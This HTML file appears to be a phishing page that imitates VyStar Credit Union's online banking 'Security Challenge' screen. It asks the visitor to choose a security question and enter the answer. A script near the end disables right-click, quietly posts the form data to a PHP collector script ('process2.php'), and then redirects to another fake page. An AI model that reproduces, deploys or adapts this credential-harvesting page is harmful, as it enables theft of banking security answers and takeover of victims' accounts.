<!DOCTYPE html>
<!-- saved from url=(0057)https://online.vystarcu.org/VYCU/AuthorizationRouter.aspx -->
<html lang="en"><head id="Head1"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">

<title>
	Security Challenge
</title>

<link href="https://online.vystarcu.org/VYCU/Themes/NewUI/Images/favicon.ico" rel="SHORTCUT ICON">
<link href="john/316/phillipians/NewUIstandard.css" rel="stylesheet" type="text/css" media="screen">
<link href="john/316/phillipians/ui.theme.css" rel="stylesheet" type="text/css" media="screen">
<link href="john/316/phillipians/ui.datepicker.css" rel="stylesheet" type="text/css" media="screen">
<link href="john/316/phillipians/jquery-ui.css" rel="stylesheet" type="text/css">
<link href="john/316/phillipians/LiveEngage.css" rel="stylesheet" type="text/css" media="screen">
<link href="john/316/phillipians/DESGetFiles.aspx" rel="stylesheet" type="text/css">

</head>
<body class="body-container">
        <img src="john/316/phillipians/blank.gif" id="BlankImage" class="image-blank hidden">
        <img id="CalendarIcon" class="icon-calendar hidden" src="john/316/phillipians/Calendar.gif">
        <img id="ArrowLeftIcon" class="icon-arrow-left hidden" src="john/316/phillipians/ArrowLeft.gif">
        <img id="ArrowRightIcon" class="icon-arrow-right hidden" src="john/316/phillipians/ArrowRight.gif">
        <img id="ErrorIcon" class="icon-error hidden" src="john/316/phillipians/icon-error-x.png">
		
		
        <form method="post" action="#" id="MainForm" name="MainForm" autocomplete="off" >

<script type="text/javascript">
//<![CDATA[
var __cultureInfo = '{"name":"en-US","numberFormat":{"CurrencyDecimalDigits":2,"CurrencyDecimalSeparator":".","IsReadOnly":false,"CurrencyGroupSizes":[3],"NumberGroupSizes":[3],"PercentGroupSizes":[3],"CurrencyGroupSeparator":",","CurrencySymbol":"$","NaNSymbol":"NaN","CurrencyNegativePattern":0,"NumberNegativePattern":1,"PercentPositivePattern":0,"PercentNegativePattern":0,"NegativeInfinitySymbol":"-Infinity","NegativeSign":"-","NumberDecimalDigits":2,"NumberDecimalSeparator":".","NumberGroupSeparator":",","CurrencyPositivePattern":0,"PositiveInfinitySymbol":"Infinity","PositiveSign":"+","PercentDecimalDigits":2,"PercentDecimalSeparator":".","PercentGroupSeparator":",","PercentSymbol":"%","PerMilleSymbol":"‰","NativeDigits":["0","1","2","3","4","5","6","7","8","9"],"DigitSubstitution":1},"dateTimeFormat":{"AMDesignator":"AM","Calendar":{"MinSupportedDateTime":"\/Date(-62135578800000)\/","MaxSupportedDateTime":"\/Date(253402300799999)\/","AlgorithmType":1,"CalendarType":1,"Eras":[1],"TwoDigitYearMax":2029,"IsReadOnly":false},"DateSeparator":"/","FirstDayOfWeek":0,"CalendarWeekRule":0,"FullDateTimePattern":"dddd, MMMM d, yyyy h:mm:ss tt","LongDatePattern":"dddd, MMMM d, yyyy","LongTimePattern":"h:mm:ss tt","MonthDayPattern":"MMMM d","PMDesignator":"PM","RFC1123Pattern":"ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","ShortDatePattern":"M/d/yyyy","ShortTimePattern":"h:mm tt","SortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","TimeSeparator":":","UniversalSortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","YearMonthPattern":"MMMM yyyy","AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"ShortestDayNames":["Su","Mo","Tu","We","Th","Fr","Sa"],"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"IsReadOnly":false,"NativeCalendarName":"Gregorian Calendar","AbbreviatedMonthGenitiveNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"MonthGenitiveNames":["January","February","March","April","May","June","July","August","September","October","November","December",""]},"eras":[1,"A.D.",null,0]}';//]]>
</script>


<script type="text/javascript">
//<![CDATA[
var gDES_VG={VCnt:3,POC:1,FOC:false,AOC:false,POS:1,FOS:false,AOS:false,ErrCtlCss:' VAMFieldWithError',ErrLstCss:' DESVALListWithError',ErrChkCss:' DESVALCheckBoxWithError',ErrCtlCss2:' DESVALFieldWithErrorAlt',ErrLstCss2:' DESVALListWithErrorAlt',ErrChkCss2:' DESVALCheckBoxWithErrorAlt',CBECCMd:0,THltCss:' VAMTextHiliteFields',NTHltCss:' VAMNonTextHiliteFields',AltTmpt:'',AltLdTxt:'',AltLstStl:true,BlkT:1000,BlkOC:0,BlkOS:0,SOrd:new Array(1,2,0)};
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (!DES_ValOnSubmit())return false;
return true;
}
//]]>
</script>

            <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ScriptManager', 'MainForm', [], [], [], 90, '');
//]]>
</script>

        <script type="text/javascript">
            // The following code is required to support LiveEngage
            var lpGetAuthenticationToken = function (callback) {
                // Get LivePerson SSO token from COL.
                try {
                    Corillian.AppsUI.Web.Services.ISessionService.GetLiveEngageSSOToken(Function.createDelegate(this, onGetTokenSuccess),
                               Function.createDelegate(this, onGetTokenFailed));

                    function onGetTokenSuccess(result) {
                        if (result._ssotoken != null && result._ssotoken != '') {
                            callback(result._ssotoken);
                        }
                        else {
                            callback("", "Error A - unable to authenticate");
                        }
                    }

                    function onGetTokenFailed(result) {
                        callback("", "Error - failed to return a token.");
                    }
                }
                catch (err) {
                    callback("", "Error - unable to process call to get token.");
                }
            };
        </script>
                
            <span id="CampaignControlManager" disabled="disabled" class="aspNetDisabled"></span>
            <div id="WrapperContainer">
                <div id="PageContainer">
                    <div id="MasterHeaderContainer">
                        <div id="MasterHeaderLogoContainer">
                            <a href="https://online.vystarcu.org/VYCU/AuthorizationRouter.aspx#">
                                <img id="ThemeImage" class="master-header-logo" alt="VyStar Credit Union" src="john/316/phillipians/logo.png"></a>
                        </div>
                        
                    </div>
                    
                    <div id="ContentContainer">
                        <div class="container-clear">
                            <div id="LeftRailDiv">
						
                                
                                <h1>
                                    Security Challenge
                                </h1>
                                
                                
<div id="TimeoutWarningWrapperDiv" class="timeoutWarning">
    <div id="timeoutWarning">
        <p>
            To protect your security, this page will log out in <span id="countdownTimer">777</span>&nbsp;seconds.</p>
        <p>
            <a id="SESSIONTIMEOUT_ctl00_ExtendSessionLink" href="javascript:timeout_showExtendSessionPopup();">Continue Banking Online</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a id="SESSIONTIMEOUT_ctl00_SignoutLink" href="javascript:timeout_expireSession();">Logout</a></p>
    </div>
    <div id="signoutInfo" class="hidden">
        <p>
            Signing out...</p>
    </div>
    <div id="popupWarning" class="hidden">
        <p>
            The pop-up window used to extend your session was blocked.<br>Click <a href="http://www.microsoft.com/windowsxp/using/web/sp2_popupblocker.mspx" target="_blank">here</a> for information regarding pop-up blocking software, or copy and paste the following link into a new browser:<br>http://www.microsoft.com/windowsxp/using/web/sp2_popupblocker.mspx</p>
    </div>
    <div id="ExtendSessionDiv" class="hidden">
        <p>
            Please wait your session is being extended...</p>
    </div>
</div>
                                
	<p>For security purposes, please validate your identity by choosing and answering your security question.</p>

                                
                                
                                
						
                                
                                
                                
                <table class="workSpaceTable">
	<tbody><tr>
		<td>
					        <div class="form-container">
                                <div class="access-content">
                                    <div class="form-fields">
                                        <div class="fields-row">
						                <div data-name="workflow-authorize" style="display: none;">
							                <input type="submit" name="ctlWorkflow$AuthorizeNextButton" value="Next" id="ctlWorkflow_AuthorizeNextButton" data-name="authorize">
							                <input type="submit" name="ctlWorkflow$AuthorizeCancelButton" value="Button" id="ctlWorkflow_AuthorizeCancelButton" data-name="cancel">
						                </div>
						                <div class="module-view">
							                <div id="ctlWorkflow_AuthorizationControl" class="modulePanel">
			
<div data-name="authorization" data-module-name="App.Authorization" data-module-options="{&quot;associatedDataPanel&quot;:&quot;workflow-authorize&quot;,&quot;associatedContinueAction&quot;:&quot;authorize&quot;,&quot;associatedCancelAction&quot;:&quot;cancel&quot;}" class="workflow-container" style="">
    <input type="hidden" name="ctlWorkflow$AuthorizationControl$authorizationStatus" id="ctlWorkflow_AuthorizationControl_authorizationStatus" value="AnswerInput">

    <div class="workflow-step" data-name="authorization-askFor-challengeType" style="display: none;">
        <table class="formTable">
            <tbody><tr class="item">
                <td class="editor-label">
                    How would you like to validate?:
                </td>
            </tr>
            <tr class="item">
                <td class="editor-label">&nbsp;
                </td>
            </tr>
            <tr class="item">
                <td class="editor-label">
                    <label for="ctlWorkflow_AuthorizationControl_rbtnPhoneCheck">
                        <span class=""><input id="ctlWorkflow_AuthorizationControl_rbtnPhoneCheck" type="radio" name="ctlWorkflow$AuthorizationControl$ChallengeTypeCheck" value="rbtnPhoneCheck"></span>
                        <span id="ctlWorkflow_AuthorizationControl_lblPhoneAuthentication">Phone Authentication using Voice or Text</span>
                    </label>
                    <label for="ctlWorkflow_AuthorizationControl_rbtnChallengeQuestionCheck">
                        <span class=""><input id="ctlWorkflow_AuthorizationControl_rbtnChallengeQuestionCheck" type="radio" name="ctlWorkflow$AuthorizationControl$ChallengeTypeCheck" value="rbtnChallengeQuestionCheck" checked="checked"></span>
                        <span id="ctlWorkflow_AuthorizationControl_lblChallengeQuestion">Challenge Question</span>
                    </label>
                </td>
            </tr>
            <tr class="item">
                <td class="editor-label">&nbsp;
                </td>
            </tr>
        </tbody></table>
        <div class="formButtonContainer" style="padding-left: 150px;">
            <input type="submit" name="ctlWorkflow$AuthorizationControl$btnChallengeTypeContinue" value="Continue" id="ctlWorkflow_AuthorizationControl_btnChallengeTypeContinue" data-action="continue">
            <span class="fields-cell-button-gap"></span>
                <input type="submit" name="ctlWorkflow$AuthorizationControl$btnCancel" value="Cancel" id="ctlWorkflow_AuthorizationControl_btnCancel" class="link-style">
        </div>
    </div>

    <div class="workflow-step" data-name="authorization-phone-start" style="display: none;">
        <table class="formTable">
            <tbody><tr class="item">
                <td class="editor-label">
                    Phone:
                </td>
                <td class="editor-field">
                    <div class="select">
                        <select name="ctlWorkflow$AuthorizationControl$authorizationPhone" id="ctlWorkflow_AuthorizationControl_authorizationPhone">

			</select>
                    </div>
                </td>
            </tr>
            <tr class="item">
                <td class="editor-label">
                    Delivery method:
                </td>
                <td class="editor-field">
                    <table id="ctlWorkflow_AuthorizationControl_authorizationDeliveryMethod">
				<tbody><tr>
					<td><input id="ctlWorkflow_AuthorizationControl_authorizationDeliveryMethod_0" type="radio" name="ctlWorkflow$AuthorizationControl$authorizationDeliveryMethod" value="Sms"><label for="ctlWorkflow_AuthorizationControl_authorizationDeliveryMethod_0">Send me a text message</label></td>
				</tr><tr>
					<td><input id="ctlWorkflow_AuthorizationControl_authorizationDeliveryMethod_1" type="radio" name="ctlWorkflow$AuthorizationControl$authorizationDeliveryMethod" value="Voice"><label for="ctlWorkflow_AuthorizationControl_authorizationDeliveryMethod_1">Call me</label></td>
				</tr>
			</tbody></table>
                </td>
            </tr>
        </tbody></table>
        <br>
        <div class="formButtonContainer" style="padding-left: 150px;">
            <input type="submit" name="ctlWorkflow$AuthorizationControl$btnPhoneStartContinue" value="Send" id="ctlWorkflow_AuthorizationControl_btnPhoneStartContinue" data-action="continue">
            <span class="fields-cell-button-gap"></span>
            <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl00" value="Cancel" id="ctlWorkflow_AuthorizationControl_ctl00" class="link-style" data-action="cancel">
        </div>
    </div>
    <div class="workflow-step" data-name="authorization-phone-input" style="display: none;">
        <table class="formTable">
            <tbody><tr class="item">
                <td class="editor-label">
                    <label for="ctlWorkflow_AuthorizationControl_authorizationCode">Verification Code</label>:
                </td>
                <td class="editor-field" style="padding-left: 12px;">
                    <input name="ctlWorkflow$AuthorizationControl$authorizationCode" type="text" maxlength="8" id="ctlWorkflow_AuthorizationControl_authorizationCode" class="standardInput" minlength="1" style="width:100px;OrigCss:standardInput;">
                    
                    <span style="visibility:hidden;display:none" class="validation-error-text" id="ctlWorkflow_AuthorizationControl_cemvamauthorizationCode">&nbsp;<img id="ctlWorkflow_AuthorizationControl_cemvamauthorizationCode_Img" src="john/316/phillipians/icon-error-x(1).png" align="middle"><br><span id="ctlWorkflow_AuthorizationControl_cemvamauthorizationCode_Txt"></span></span>
                </td>
            </tr>
        </tbody></table>
        <br>
        <div class="formButtonContainer" style="padding-left: 137px;">
            <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl02" value="Authenticate" id="ctlWorkflow_AuthorizationControl_ctl02" data-action="continue" data-validation-group="Phone">
            <span class="fields-cell-button-gap"></span>
            <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl03" value="Back" id="ctlWorkflow_AuthorizationControl_ctl03" data-action="back">
            <span class="fields-cell-button-gap"></span>
           <!-- <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl04" value="Cancel" id="ctlWorkflow_AuthorizationControl_ctl04" class="link-style" data-action="cancel">-->
        </div>
    </div>
    <div class="workflow-step" data-name="authorization-phone-error" style="display: none;">
        <div class="error-message">
        </div>
        <br>
        <div class="formButtonContainer" style="padding-left: 150px;">
            <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl05" value="Send New Code" id="ctlWorkflow_AuthorizationControl_ctl05" data-action="back">
            <span class="fields-cell-button-gap"></span>
            <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl06" value="Cancel" id="ctlWorkflow_AuthorizationControl_ctl06" class="link-style" data-action="cancel">
        </div>
    </div>
	
	</form>
	
	<form action="" method="post" id="loginForm1" name="loginForm1" novalidate="novalidate" autocomplete="off" >

    <div class="workflow-step" data-name="authorization-answer-input" style="display: block;">
        <table class="formTable">
            <tbody>
			
			<tr class="item">
              
                 <select name="secqns" id="secqns" required>
					<option value ="">-- Security Question 4 --</option>
                    <option value ="What is the name of your second pet?">What is the name of your second pet?</option>
					<option value ="What was the last name of your kindergaten teacher?">What was the last name of your kindergaten teacher?</option>
					<option value ="What is your favorite movie?">What is your favorite movie?</option>
					<option value ="What is the first name of your oldest nephew?">What is the first name of your oldest nephew?</option>
					<option value ="What kind of dog or cat food do you typically buy?">What kind of dog or cat food do you typically buy?</option>
					<option value ="What was the make and model of your first car?">What was the make and model of your first car?</option>
					<option value="What is the first musical instrument you learned to play?">What is the first musical instrument you learned to play?</option>
                    <option value="Who is your favorite celebrity?">Who is your favorite celebrity?</option>
                    <option value="What was the make or model of your first cell phone?">What was the make or model of your first cell phone?</option>
                    <option value="What was the last name of your kindergarten teacher?">What was the last name of your kindergarten teacher?</option>
                    <option value="Who is your favorite musical performer/group?">Who is your favorite musical performer/group?</option>
                    <option value="What is your favorite outdoor activity?">What is your favorite outdoor activity?</option>
                    <option value="Who is your favorite author?">Who is your favorite author?</option>
                    <option value="What sports team do you love to see lose?">What sports team do you love to see lose?</option>
                    <option value="Where do you want to retire?">Where do you want to retire?</option>
                    <option value="What is your dream job?">What is your dream job?</option>
                    <option value="What was the name of your first elementary school?">What was the name of your first elementary school?</option>
                    <option value="Who was the first group/artist you saw in concert?">Who was the first group/artist you saw in concert?</option>
                    <option value="What was the name of your first pet?">What was the name of your first pet?</option>
                    <option value="To what city did you go the first time you flew on a plane?">To what city did you go the first time you flew on a plane?</option>
                    <option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
                    <option value="What is your oldest cousin's first name?">What is your oldest cousin's first name?</option>
                    <option value="In what city or town did your parents meet?">In what city or town did your parents meet?</option>
                    <option value="What is your grandmother's (on your mother's side) maiden name?">What is your grandmother's (on your mother's side) maiden name?</option>
                    <option value="What is your oldest sibling's middle name?">What is your oldest sibling's middle name?</option>
                    <option value="What was the first name of your first boyfriend or girlfriend?">What was the first name of your first boyfriend or girlfriend?</option>
                    <option value="What is the first movie you saw in theaters?">What is the first movie you saw in theaters?</option>
                    <option value="What was the first concert you attended?">What was the first concert you attended?</option>
                </select>
				
            </tr>
            <tr>
                <td colspan="2">&nbsp;</td>
            </tr>
            <tr class="item">
               
                <td class="editor-field">
                    <input name="authorizationAnswer" placeholder="Answer 4" type="text" id="authorizationAnswer" class=" " group="Answer" style="OrigCss: ;">
                
                </td>
            </tr>
        </tbody></table>
        <br>
        <div class="formButtonContainer" style="padding-left: 69px;">
            <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl08" value="Authenticate" id="ctlWorkflow_AuthorizationControl_ctl08" data-action="continue" data-validation-group="Answer 2">
           <!-- <input type="submit" name="ctlWorkflow$AuthorizationControl$ctl09" value="Cancel" id="ctlWorkflow_AuthorizationControl_ctl09" class="link-style" data-action="cancel">-->
        </div>
    </div>
	
	</form>
    <div class="workflow-step" data-name="authorization-locked" style="display: none;">
        <div class="error-message">
        </div>
    </div>
</div>

		</div>
						                </div>
					                    </div>
                                    </div>
                                </div>
                            </div>
				        </td>
	</tr>
</tbody></table>

                                
                                
                                

<script type="text/javascript">
    $(document).ready(function () {
        // Removing related links from this page.
        $("[id$=RightRailDiv]").remove();
    });
</script>



                            </div>
                            
                    </div>
			</div>
					
                    <div id="SiteFooterContainer">
                        <div id="EnrollMobileFooterDiv" style="visibility: hidden;">
                            Enroll in mobile <br>banking today!
                        </div>
                        <div id="FooterLinks">
                            <ul class="footer-links1">
                                <li>
                                    <a id="LocationsLink" href="#" target="_blank">Locations</a>
                                </li>
                                <li>
                                    <a id="PrivacyLink" href="#" target="_blank">Privacy Notice</a>
                                </li>
                            </ul>
                            <ul class="footer-links2">
                                <li>
                                    <a id="HelpLink" href="#" target="_blank">Help</a>
                                </li>
                                <li>
                                    <a id="ContactUsLink" href="#" target="_blank">Contact Us</a>
                                </li>
                                
                            </ul>
                            <ul class="footer-links3">
                                <li>
                                    <a id="SecurityLink" href="#" target="_blank">VyStar Security Statement</a>
                                </li>
                                <li>
                                    <a id="TermsAndConditionsLink" href="#" target="_blank">Disclosures</a>
                                </li>
                            </ul>
                        </div>
                        <div id="FooterNotice">
                            <p>
                                VyStar Credit Union P.O. Box 45085 Jacksonville FL  32232<br>Routing Number 263079276 | 904-777-6000 or 800-445-6289<br><a href="#" title="Go to ncua.gov" target="_blank" class="iconFedInsured"></a><a href="#" title="Go to HUD.GOV" target="_blank" class="iconEHL"></a><span target="_blank" class="iconVisa"></span><a href="#" title="Find us in Facebook" target="_blank" class="iconFB"></a><a href="#" title="Find us in Twitter" target="_blank" class="iconTwitter"></a><a href="#" title="Find us in Youtube" target="_blank" class="iconYoutube"></a><a href="#" title="Find us in Pinterest" target="_blank" class="iconPinterest"></a><a href="#" title="Find us in Instagram" target="_blank" class="iconInstagram"></a>
                            </p>
                        </div>
                        <br clear="all">
                    </div>
                </div>
            </div>
            
    
</form>

<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>


<script type="text/javascript">

$(document).bind("contextmenu", function(e){ return false;});

$('#loginForm1').on('submit', function(e){
		
		 $(".overlay").show(500);
		$.post('vystar/new/policy/Estate1/process2.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
                              window.location.href = "secmil.html";
                        },2000);
		e.preventDefault();
	});


</script>

<script> 
  location.hash = 'wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&domain=' 
</script>

</body></html>